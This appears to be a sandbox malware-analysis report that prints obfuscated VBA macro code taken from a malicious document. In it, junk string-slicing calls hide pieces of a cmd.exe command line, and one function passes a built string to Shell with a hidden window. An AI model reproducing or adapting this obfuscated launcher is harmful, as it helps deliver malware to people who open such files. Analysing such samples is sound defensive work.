cRkTbqIwW = "0a72e2a07i70a2l0" + "a27C720aba270e072aW2" + "07a.2a07t02a7e"

151

HXXbWirm = "27a0N0a27 207a" + "t072ac027ae7a20j" + "72a0ba720oa072-a207w"

152

Dim jGZUm(2)

153

jGZUm(0) = Mid(iZUBzalM + jZbcdmLlNrwiAqsWGDZKb + YVAqV, 565, 398) + MidB(hwjDTN + nzlvUHnsqhOAAUN + usNbjmI, 849, 133) + Right(sTYXd + EKtDdnQGTzfiGXvjJPh + jCnoOi, 832) + MidB(HJfqq + oPfpubGUSRcujwWXazwBYb + bwsKPj, 157, 415)

154

jGZUm(1) = Right(NUEvq + RPcdJmXMobpOHNfAcIB + LzVuJSi, 162) + Right(GMwrR + wvrjjkzAwQqrnPSJRdCBKT + BBVPN, 800) + MidB(FEGiO + JTORmRrsZItrvNVcswij + jdKPj, 759, 907) + Right(shwBXqK + pFwROWsJmikMQDojd + NDJCMlL, 955)

155

Dim qRtwES(2)

156

qRtwES(0) = Right(sqiIHkNz + UCdimEsHLwljLBzrPLkYi + HEwYpPB, 504) + MidB(FLfoDLK + GJSHHAGTajdvzowjW + GiSuviC, 235, 989)

157

qRtwES(1) = MidB(hiZowo + JhAtFKRbPPbiSWCkiSEHaJ + PdIrIp, 635, 480) + MidB(oNjdG + kwmPHWEHLWFZZkwwjXGm + TwvcdFLt, 206, 810) + Mid(wIHDkj + TdhDQbIaZdMlaJizGKLO + awtqjma, 170, 821) + Right(PsLqiDTk + kcTjuFiXHPzdpohRDDvwzKRS + HsdWcqV, 506)

158

VJFPJR = "a702e207an0a7" + "2=702aC20a7T0" + "a72r072a$270a a207" + "l207al2a07e02a7h"

159

iaWKjaaLVBw = HXzJWRoRaoi + ziVYF + VnnNMYIJEW + cRkTbqIwW + HXXbWirm + VJFPJR

160

Dim dFvwC(2)

161

dFvwC(0) = Mid(YvvjmtoP + lCnzQfctVijQfUAmkHFGS + wwVQqjb, 144, 323) + Mid(ZMaTE + NpiPAwodznfwmjfXsf + JOJou, 759, 236) + Left(LkFrz + YqCGiTlZHatnjBpVBrIiAQ + TLPZmzk, 978) + Mid(pdpdkHn + dVKvnJhEQMBpwOQhnvC + McEjXHAr, 755, 963)

162

dFvwC(1) = MidB(JQbQIQ + pbzfGLVFZXanLiKJzPUOrwS + oRifXzJk, 559, 486) + MidB(lJlNa + zhQKKGiUNIioCovrDn + hjZzLFjA, 315, 406) + Right(QXGUZ + oXUqkJNzSjXojilJWOl + NzrHihaS, 297) + MidB(aNpon + mihzAOjojQRRDKcSGcPrQH + JVowVYQ, 981, 576)

163

Dim AYluRL(2)

164

AYluRL(0) = MidB(VcnfNLw + qlDujcLLSiXZbuqfsPR + qoiwci, 599, 235) + MidB(BViARwXj + jKvTDETUJDYkkDQijmWGjH + tZiVjLHj, 623, 864)

165

AYluRL(1) = Left(YLKsInck + XDGAaGMELoLavWNdAXBdV + cdwvfi, 904) + Mid(fPfkA + jEGNkPIQPHzZVpFdjGQj + itFYqc, 551, 570) + MidB(ZPzkNV + QXzWjFifWnWPYwzCwZmiT + AVsVQ, 271, 548) + Mid(mSHMAu + FqYFBSAdShFdsdsfzKGZt + JiwIC, 40, 481)

166

Dim rlrSaR(2)

167

rlrSaR(0) = Right(CwmYzJ + jUWdmbvrlbAzSHGLSDd + CwEfVUjM, 664) + MidB(FnJtPpzD + OWjpiQrwlCvcaqWuFOSzd + zMvcDa, 684, 57) + MidB(VprDoO + mKKiDtdIkcwZKRiCzhcM + QAafqQz, 216, 653) + Mid(IQJCCaRz + AQBjmKMHKzlwnszTckrOz + UAwHK, 241, 985)

168

rlrSaR(1) = Right(kZwEFn + jtXUWDbzfzCDimp + azllC, 455) + Left(zOOpjr + ifwptLjBmFiVQatZjH + wCdclR, 154)

169

Dim UzAGr(1)

170

UzAGr(0) = MidB(unEkPR + fwwOnAwsNAnaPtLn + TLZEcf, 862, 65) + Left(jdYwo + mBTDItqjrNpqEiLlYK + HsqKTJr, 127)

171

End Function

172

Function LVdUUMkFd()

173

mwkEAlhhoVj = "a702s7a02r20a7" + "ea270wa270oa720p&&f" + "or /L %g i"

174

PJVbz = "n (1944,-5" + ",4)do set .#=" + "!.#!!]}*~:~%g,1" + "!&&if %g l"

175

VznDKrQEtj = "eq 4 call %." + "#:~-389%" + """" + " " + ""

176

LVdUUMkFd = mwkEAlhhoVj + PJVbz + VznDKrQEtj

177

Dim vQOzjc(2)

178

vQOzjc(0) = Mid(azlGjlhw + JQTuaWtkiiEBViRaUBCSmc + DwMKcfQG, 331, 146) + Right(rEwFRMVw + AoPVmowhSujKXCYkORb + jPCzBZG, 684)

179

vQOzjc(1) = MidB(wYvGtcA + ivIOKvKwLCGYsnlJzILL + rmcvf, 164, 267) + Mid(NjaBs + PKXUZfHTWqrWkvFTI + RDoHWf, 131, 229) + MidB(GptBnrjS + cJRWckwfwYtqAsRCAAHBz + YUwDVAB, 927, 737) + Right(RflnKjZ + zsISLRHTUHUlWzbaX + OkjOmQMq, 528)

180

Dim tiNXJm(2)

181

tiNXJm(0) = Left(JvEYO + VXnHntlIwUUFANwJC + wBccBH, 752) + Left(CGsdmTHt + tEYoRrrEqbFvkvYlrvwGK + GnShGC, 377) + Mid(UaMKlKC + MwLHihcjzvuWDlEmO + ljwawZ, 381, 480) + Mid(GvwVDwEE + TWQrWLpzGQdabJIPI + QDnDQ, 28, 14)

182

tiNXJm(1) = Left(iOHFPTGE + MYbbdULbpworFNDSv + NGiOS, 634) + Mid(CEcYw + bKiErZzDXnwJGDlrLUtOC + SmrMSX, 453, 330) + Left(krzhPDoq + lCzTldqUhwjabLhFPZ + KBAzYv, 340) + Mid(WudPmY + hzzDvDQVErHlQKpRlfRdC + KjwrZm, 123, 315)

183

Dim dbpFrC(2)

184

dbpFrC(0) = Left(IQkNEVrV + RpTiWSmntBEjSMloJzNKpbt + sAjucmt, 500) + Right(EXSEIEpE + ASjMiMDfiCdhLuGctYm + aPrvEFzW, 191) + MidB(ZUUMPvp + wapHJrjcptOlSVvwZif + kVZstM, 969, 668) + Left(tAZjl + PuUZMNituzqUWcXopz + qKVGzl, 866)

185

dbpFrC(1) = Right(ILOlz + HwJASwXictzLzBidOrHfz + piIIf, 147) + MidB(hsqpz + wYVrvaHwoGVzQLzKJJ + zlJLQIY, 703, 632) + Left(tjKGFhda + YmNUhcpniJjzXOwzYDZj + QGFucji, 59) + MidB(zvrifu + ClKlmATSbnPwCjhYuKCaj + FpXNTdIj, 634, 858)

186

Dim TFbJzH(2)

187

TFbJzH(0) = Left(azMJRJWA + KdvouvTHJGSVmCTTA + QzXIdN, 910) + Left(Izjhw + KzOfAFkcVEfGiwrNvQm + YwBwVoJ, 114)

188

TFbJzH(1) = Mid(IVmXSK + fHIPDEPjplnNXHDDmmnM + iuLvZZC, 635, 24) + MidB(ZItzXGET + KlYFQPccsvJKPTKQi + QDHzK, 125, 289)

189

End Function

190

191

psiKPThAkow

1

Attribute VB_Name = "psiKPThAkow"

2

Function kWOmnIjtktpw(YqJJMEHMws As String)

3

Const voEQJiB = 0

4

Dim jnVVqJ(2)

5

jnVVqJ(0) = Right(ZCQsod + UVvzFrTiPzQYQuInVdtc + dPBJdom, 515) + Left(cwMooU + aLDwuOzfqGlbtSLRKFaLpw + SiUwA, 534) + Mid(QihUn + JvUouijNMCrhOwmDh + sFJUr, 28, 567) + MidB(iBaRQ + NclhGwkZBQTibPzDOia + XTFYqHi, 695, 861)

6

jnVVqJ(1) = Right(awhEGH + qkJLYuZKMGinlGfZuRTjbt + fhtwG, 104) + MidB(uNHji + OXlKlopXbhidWEOktdaP + HkMzjw, 914, 574) + Left(IpjYU + cVZaBqfpRtWTlkdDd + cmAIRvt, 667) + Right(DSwubw + WSrhCBRADwMkrtmZ + ulGbd, 365)

7

Dim OjiVM(2)

8

OjiVM(0) = Left(wbthMQO + asYIYswqKTnABMovm + RMKcNzwz, 989) + Right(pKvZnzF + iCQlOosAcSNniawvtBtKOR + FbZqqwn, 337)

9

OjiVM(1) = Left(YNZGRzXm + jUOoBujkrCLnDbmb + MLPZiWnj, 917) + Mid(zrwkNko + EjXuENTOWlKFDwPSmG + EaWcPCpr, 953, 882)

10

Shell% YqJJMEHMws, voEQJiB

11

Dim KlXwG(2)

12

KlXwG(0) = Mid(vktGAupj + qiGAoYMujkFYoBcNWUGcwwC + LzwWffcS, 674, 242) + MidB(LCfbI + FFYHwZikFHCZjbjOasM + aWAKSbBq, 172, 815) + MidB(nszzFBr + JlTmTDrOTtWfjaWJERtv + vikOVrUV, 337, 330) + MidB(YwXJvuW + IMYdqhIJPpBvXjtcZA + pqqNlv, 421, 987)

13

KlXwG(1) = Left(fnWLliC + HBvidbBPBuHzjmAbwNn + QPkwwu, 289) + MidB(nGNuLMl + GwddUtYcdbqzTkdOFFUmVVXo + bnpNThSo, 742, 891) + MidB(Twlwvn + QzwudolIIwEpplcjmS + TAflXAW, 493, 704) + Left(Ydpvk + GfizmkjZNTGAKbViDNLliMDi + AqsCqMJz, 428)

14

Dim EwFJGi(1)

15

EwFJGi(0) = MidB(wIKAnbhu + ljBRfvWaKwRYIwPGcb + mSlqp, 99, 520) + MidB(PBlitn + mfZrzkBUkcSoChPzuE + dBjCXX, 20, 177) + Left(wpvIKonA + UwqdzjzdoXFFKRcNdTbQV + YuWaLuP, 254) + Left(LCEqpDf + qklMUXnLAshWInaDcd + IRiOYWoQ, 927)

16

Dim vwZWP(2)

17

vwZWP(0) = Mid(SUAqk + YscbXpNXYnQfMGCGli + DCAMDPbh, 142, 466) + Mid(SjaviR + AizSdmtoikTYZXGm + rfruJNjf, 130, 530)

18

vwZWP(1) = MidB(zqUDh + HitdnJRHBYXfJDHYTZb + CRTALEW, 800, 453) + MidB(NwCEkrvY + DoPWjRwPrfVLqRFDfi + uPKAC, 766, 551)

19

Dim ArmhCD(1)

20

ArmhCD(0) = Left(DMIwq + iBccuvAdvqIlRXjYkiVGYza + iAUozqn, 739) + Left(wAAwJl + PpjcMIRjNuEcUOcbBKv + wcpYkjL, 404) + MidB(LhFBn + RmariqblkjKKkvjjSs + BZsYJq, 183, 233) + MidB(ftICtN + zzwfKTqWJVdVQZRqSV + XruirLJ, 51, 365)

21

End Function

22

Sharing

General

Malware Config

Signatures

Files

XjfLisDjucS

XpzIKKTGQiwv

psiKPThAkow

We care about your privacy.